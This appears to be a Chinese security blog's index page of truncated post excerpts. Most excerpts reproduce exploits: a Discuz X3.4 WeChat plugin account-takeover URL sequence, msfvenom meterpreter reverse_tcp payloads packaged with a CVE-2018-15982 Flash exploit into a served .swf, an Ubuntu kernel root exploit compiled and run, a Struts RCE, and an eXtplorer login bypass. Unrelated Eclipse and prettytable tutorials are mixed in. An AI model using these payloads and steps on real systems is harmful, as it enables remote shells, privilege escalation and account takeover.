影响版本x3.4，安装并开启了微信登录插件原贴：https://www.sk15.net/archives/119.html?tdsourcetag=s_pcqq_aiomsg EXP# 随机登陆一个账号，任意填写 /plugin.php?id=wechat:wechat&ac=wxregister&username={username} # 清空tmp /plugin.php?id=wechat:wechat&ac=unbindmp&uid={uid}&hash={csrf_hash} # 注册账号 /plugin.php?id=wechat:wechat&ac=wxregister&username={username}&wxopenid=abcdefg 登录之后会跳转到微信，然后回到首页刷新即可 ...

简介当地时间12月5日,Adobe官方发布安全通告修复了两个漏洞,分别是Adobe Flash Player中的0day漏洞CVE-2018-15982Adobe和Flash Player installer中的高危 捆绑监听msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw > 86.bin msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw > 64.bin python CVE-2018-15982.py -i 86.bin -I 64.bin -o apt.swf 生成为文件复制到/var/www/html/下并开启apache服务...

漏洞简介Twitter上Nikolenko发推表示ubuntu最新版本存在一个本地提权漏洞，并且提供了EXP下载地址该漏洞在老版本中已经完成修复，但是在ubuntu16.04版本依旧可以被利用。 影响版本受影响版本: 4.14 - 4.4.0-103 内核版本 漏洞利用把exp上传到拥有漏洞的Linux服务器 然后我们开始编译该文件 gcc -o upstream44 upstream44.c 得到可执行文件upstream44 最后,执行刚刚编译后的文件 ./upstream44 成功提升到root权限...

简介定义XML配置时如果namespace值未设置且上层动作配置（Action Configuration）中未设置或用通配符namespace时可能会导致远程代码执行 url标签未设置value和action值且上层动作未设置或用通配符namespace时可能会导致远程代码执行...

简介extplorer是一个文件管理的CMS 原文：https://mp.weixin.qq.com/ 漏洞复现利用：post表单提交的时候把密码参数去掉，并确定该账户存在 感觉一个个猜太麻烦了，菜鸡的我写了一个简易脚本(写码三分钟，debug一整天)...

下载EclipseEclipse官方下载地址: https://www.eclipse.org/downloads/eclipse-packages/根据自己的需求选择不同的版本...

ADT安装的两种方式在eclipse的插件安装界面中通过在线安装在线安装地址:http://dl-ssl.google.com/androd/eclipse/ 打开eclipse - help - install New Software...

扯淡之前写了一个破解WIFI的，本来那天就应该写的，结果那个网卡不支持修改MAC地址 还搞了几天，还是没成功，最后网卡被我分尸了，感觉实在是受不了这委屈（特地另开一章） 盘他...

简介今天在一个在线靶场上做题，发现了一个没有数字和字母组成的一句话！很好奇，也看不懂，就去求助了某世。。。转来转去一个钟后，emm，终于看懂了...

0X00 安装pip install prettytable0X01 创建表(1).直接创建x = PrettyTable()...